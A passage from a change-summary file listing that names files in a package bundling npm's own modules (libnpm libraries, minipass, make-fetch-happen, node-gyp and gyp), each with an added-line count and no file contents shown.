  1207. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/utf8.js +38 -0
  1208. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff/LICENSE +21 -0
  1209. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff/index.cjs +230 -0
  1210. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff/index.mjs +227 -0
  1211. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff/package.json +33 -0
  1212. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff/rollup.config.js +3 -0
  1213. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff-apply/LICENSE +21 -0
  1214. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff-apply/index.cjs +161 -0
  1215. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff-apply/index.mjs +158 -0
  1216. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff-apply/package.json +34 -0
  1217. package/.config/npm/node_global/lib/node_modules/npm/node_modules/just-diff-apply/rollup.config.js +3 -0
  1218. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmaccess/LICENSE +13 -0
  1219. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmaccess/README.md +93 -0
  1220. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmaccess/lib/index.js +140 -0
  1221. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmaccess/package.json +53 -0
  1222. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/LICENSE +15 -0
  1223. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/README.md +96 -0
  1224. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/lib/format-diff.js +96 -0
  1225. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/lib/index.js +62 -0
  1226. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/lib/should-print-patch.js +22 -0
  1227. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/lib/tarball.js +38 -0
  1228. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/lib/untar.js +96 -0
  1229. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmdiff/package.json +70 -0
  1230. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/LICENSE +15 -0
  1231. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/README.md +48 -0
  1232. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/file-exists.js +33 -0
  1233. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/get-bin-from-manifest.js +22 -0
  1234. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/index.js +283 -0
  1235. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/is-windows.js +1 -0
  1236. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/no-tty.js +1 -0
  1237. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/lib/run-script.js +71 -0
  1238. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmexec/package.json +79 -0
  1239. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmfund/LICENSE +15 -0
  1240. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmfund/README.md +131 -0
  1241. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmfund/lib/index.js +210 -0
  1242. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmfund/package.json +64 -0
  1243. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmhook/LICENSE.md +16 -0
  1244. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmhook/README.md +271 -0
  1245. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmhook/lib/index.js +70 -0
  1246. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmhook/package.json +56 -0
  1247. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmorg/LICENSE +13 -0
  1248. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmorg/README.md +148 -0
  1249. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmorg/lib/index.js +64 -0
  1250. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmorg/package.json +61 -0
  1251. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpack/LICENSE +13 -0
  1252. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpack/README.md +55 -0
  1253. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpack/lib/index.js +69 -0
  1254. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpack/package.json +58 -0
  1255. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/LICENSE +13 -0
  1256. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/README.md +120 -0
  1257. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/lib/index.js +4 -0
  1258. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/lib/provenance.js +243 -0
  1259. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/lib/publish.js +296 -0
  1260. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/lib/unpublish.js +119 -0
  1261. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmpublish/package.json +65 -0
  1262. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmsearch/LICENSE +13 -0
  1263. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmsearch/README.md +173 -0
  1264. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmsearch/lib/index.js +71 -0
  1265. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmsearch/package.json +57 -0
  1266. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmteam/LICENSE +13 -0
  1267. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmteam/README.md +188 -0
  1268. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmteam/lib/index.js +92 -0
  1269. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmteam/package.json +51 -0
  1270. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/LICENSE +15 -0
  1271. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/README.md +164 -0
  1272. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/commit.js +17 -0
  1273. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/enforce-clean.js +32 -0
  1274. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/index.js +40 -0
  1275. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/read-json.js +7 -0
  1276. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/retrieve-tag.js +13 -0
  1277. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/tag.js +30 -0
  1278. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/version.js +140 -0
  1279. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/lib/write-json.js +16 -0
  1280. package/.config/npm/node_global/lib/node_modules/npm/node_modules/libnpmversion/package.json +54 -0
  1281. package/.config/npm/node_global/lib/node_modules/npm/node_modules/lru-cache/LICENSE +15 -0
  1282. package/.config/npm/node_global/lib/node_modules/npm/node_modules/lru-cache/index.js +1227 -0
  1283. package/.config/npm/node_global/lib/node_modules/npm/node_modules/lru-cache/index.mjs +1227 -0
  1284. package/.config/npm/node_global/lib/node_modules/npm/node_modules/lru-cache/package.json +96 -0
  1285. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/LICENSE +16 -0
  1286. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/agent.js +214 -0
  1287. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/cache/entry.js +469 -0
  1288. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/cache/errors.js +11 -0
  1289. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/cache/index.js +49 -0
  1290. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/cache/key.js +17 -0
  1291. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/cache/policy.js +161 -0
  1292. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/dns.js +49 -0
  1293. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/fetch.js +118 -0
  1294. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/index.js +41 -0
  1295. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/options.js +54 -0
  1296. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/pipeline.js +41 -0
  1297. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/lib/remote.js +121 -0
  1298. package/.config/npm/node_global/lib/node_modules/npm/node_modules/make-fetch-happen/package.json +78 -0
  1299. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/LICENSE +15 -0
  1300. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/assert-valid-pattern.js +14 -0
  1301. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/ast.js +566 -0
  1302. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/brace-expressions.js +152 -0
  1303. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/escape.js +22 -0
  1304. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/index.js +1011 -0
  1305. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/package.json +3 -0
  1306. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/cjs/unescape.js +24 -0
  1307. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/assert-valid-pattern.js +10 -0
  1308. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/ast.js +562 -0
  1309. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/brace-expressions.js +148 -0
  1310. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/escape.js +18 -0
  1311. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/index.js +995 -0
  1312. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/package.json +3 -0
  1313. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/dist/mjs/unescape.js +20 -0
  1314. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minimatch/package.json +86 -0
  1315. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass/LICENSE +15 -0
  1316. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass/index.js +702 -0
  1317. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass/index.mjs +702 -0
  1318. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass/package.json +76 -0
  1319. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/LICENSE +15 -0
  1320. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/index.js +71 -0
  1321. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/node_modules/minipass/LICENSE +15 -0
  1322. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/node_modules/minipass/index.js +649 -0
  1323. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/node_modules/minipass/package.json +56 -0
  1324. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-collect/package.json +29 -0
  1325. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/LICENSE +28 -0
  1326. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/abort-error.js +17 -0
  1327. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/blob.js +97 -0
  1328. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/body.js +350 -0
  1329. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/fetch-error.js +32 -0
  1330. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/headers.js +267 -0
  1331. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/index.js +377 -0
  1332. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/request.js +282 -0
  1333. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/lib/response.js +90 -0
  1334. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-fetch/package.json +69 -0
  1335. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/LICENSE +15 -0
  1336. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/index.js +39 -0
  1337. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/node_modules/minipass/LICENSE +15 -0
  1338. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/node_modules/minipass/index.js +649 -0
  1339. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/node_modules/minipass/package.json +56 -0
  1340. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-flush/package.json +39 -0
  1341. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/LICENSE +27 -0
  1342. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/index.js +227 -0
  1343. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/node_modules/minipass/LICENSE +15 -0
  1344. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/node_modules/minipass/index.js +649 -0
  1345. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/node_modules/minipass/package.json +56 -0
  1346. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-json-stream/package.json +39 -0
  1347. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/LICENSE +15 -0
  1348. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/index.js +128 -0
  1349. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/node_modules/minipass/LICENSE +15 -0
  1350. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/node_modules/minipass/index.js +649 -0
  1351. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/node_modules/minipass/package.json +56 -0
  1352. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-pipeline/package.json +29 -0
  1353. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/LICENSE +15 -0
  1354. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/index.js +67 -0
  1355. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/node_modules/minipass/LICENSE +15 -0
  1356. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/node_modules/minipass/index.js +649 -0
  1357. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/node_modules/minipass/package.json +56 -0
  1358. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/package.json +39 -0
  1359. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minipass-sized/test/basic.js +83 -0
  1360. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/LICENSE +26 -0
  1361. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/constants.js +115 -0
  1362. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/index.js +348 -0
  1363. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/node_modules/minipass/LICENSE +15 -0
  1364. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/node_modules/minipass/index.js +649 -0
  1365. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/node_modules/minipass/package.json +56 -0
  1366. package/.config/npm/node_global/lib/node_modules/npm/node_modules/minizlib/package.json +42 -0
  1367. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/LICENSE +21 -0
  1368. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/bin/cmd.js +68 -0
  1369. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/index.js +31 -0
  1370. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/find-made.js +29 -0
  1371. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/mkdirp-manual.js +64 -0
  1372. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/mkdirp-native.js +39 -0
  1373. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/opts-arg.js +23 -0
  1374. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/path-arg.js +29 -0
  1375. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/lib/use-native.js +10 -0
  1376. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/package.json +44 -0
  1377. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mkdirp/readme.markdown +266 -0
  1378. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ms/index.js +162 -0
  1379. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ms/license.md +21 -0
  1380. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ms/package.json +38 -0
  1381. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mute-stream/LICENSE +15 -0
  1382. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mute-stream/lib/index.js +142 -0
  1383. package/.config/npm/node_global/lib/node_modules/npm/node_modules/mute-stream/package.json +52 -0
  1384. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/HISTORY.md +108 -0
  1385. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/LICENSE +24 -0
  1386. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/index.js +82 -0
  1387. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/lib/charset.js +169 -0
  1388. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/lib/encoding.js +184 -0
  1389. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/lib/language.js +179 -0
  1390. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/lib/mediaType.js +294 -0
  1391. package/.config/npm/node_global/lib/node_modules/npm/node_modules/negotiator/package.json +42 -0
  1392. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/.github/ISSUE_TEMPLATE.md +52 -0
  1393. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/.github/PULL_REQUEST_TEMPLATE.md +17 -0
  1394. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/.github/workflows/release-please.yml +56 -0
  1395. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/.github/workflows/tests.yml +55 -0
  1396. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/.github/workflows/visual-studio.yml +33 -0
  1397. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/CHANGELOG.md +826 -0
  1398. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/CONTRIBUTING.md +34 -0
  1399. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/LICENSE +24 -0
  1400. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/README.md +259 -0
  1401. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/SECURITY.md +2 -0
  1402. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/addon.gypi +204 -0
  1403. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js +140 -0
  1404. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/Error-pre-versions-of-node-cannot-be-installed.md +94 -0
  1405. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/Force-npm-to-use-global-node-gyp.md +47 -0
  1406. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/Home.md +7 -0
  1407. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/Linking-to-OpenSSL.md +86 -0
  1408. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/README.md +19 -0
  1409. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/Updating-npm-bundled-node-gyp.md +72 -0
  1410. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/docs/binding.gyp-files-in-the-wild.md +49 -0
  1411. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/.flake8 +4 -0
  1412. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/.github/workflows/Python_tests.yml +36 -0
  1413. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/.github/workflows/node-gyp.yml +45 -0
  1414. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/.github/workflows/nodejs-windows.yml +32 -0
  1415. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/.github/workflows/release-please.yml +16 -0
  1416. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/AUTHORS +16 -0
  1417. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/CHANGELOG.md +233 -0
  1418. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/CODE_OF_CONDUCT.md +4 -0
  1419. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/CONTRIBUTING.md +32 -0
  1420. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/LICENSE +28 -0
  1421. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/README.md +7 -0
  1422. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/data/win/large-pdb-shim.cc +12 -0
  1423. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/gyp +8 -0
  1424. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/gyp.bat +5 -0
  1425. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/gyp_main.py +45 -0
  1426. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSNew.py +367 -0
  1427. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSProject.py +206 -0
  1428. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings.py +1270 -0
  1429. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings_test.py +1547 -0
  1430. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSToolFile.py +59 -0
  1431. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSUserFile.py +153 -0
  1432. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSUtil.py +271 -0
  1433. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py +574 -0
  1434. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/__init__.py +690 -0
  1435. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common.py +661 -0
  1436. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common_test.py +78 -0
  1437. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/easy_xml.py +165 -0
  1438. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/easy_xml_test.py +109 -0
  1439. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/flock_tool.py +55 -0
  1440. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/__init__.py +0 -0
  1441. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/analyzer.py +808 -0
  1442. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/android.py +1173 -0
  1443. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/cmake.py +1321 -0
  1444. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/compile_commands_json.py +120 -0
  1445. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/dump_dependency_json.py +103 -0
  1446. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/eclipse.py +464 -0
  1447. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/gypd.py +89 -0
  1448. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py +58 -0
  1449. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/make.py +2717 -0
  1450. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/msvs.py +3981 -0
  1451. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/msvs_test.py +44 -0
  1452. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja.py +2936 -0
  1453. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja_test.py +55 -0
  1454. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/xcode.py +1394 -0
  1455. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/xcode_test.py +25 -0
  1456. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/input.py +3130 -0
  1457. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/input_test.py +98 -0
  1458. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/mac_tool.py +771 -0
  1459. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/msvs_emulation.py +1271 -0
  1460. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/ninja_syntax.py +174 -0
  1461. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/simple_copy.py +61 -0
  1462. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/win_tool.py +374 -0
  1463. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xcode_emulation.py +1939 -0
  1464. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xcode_ninja.py +302 -0
  1465. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xcodeproj_file.py +3197 -0
  1466. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xml_fix.py +65 -0
  1467. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/pyproject.toml +41 -0
  1468. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/test_gyp.py +261 -0
  1469. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/README +15 -0
  1470. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/Xcode/README +5 -0
  1471. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/Xcode/Specifications/gyp.pbfilespec +27 -0
  1472. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/Xcode/Specifications/gyp.xclangspec +226 -0
  1473. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/README +12 -0
  1474. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/gyp-tests.el +63 -0
  1475. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/gyp.el +275 -0
  1476. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/run-unit-tests.sh +7 -0
  1477. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/testdata/media.gyp +1105 -0
  1478. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/emacs/testdata/media.gyp.fontified +1107 -0
  1479. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/graphviz.py +102 -0
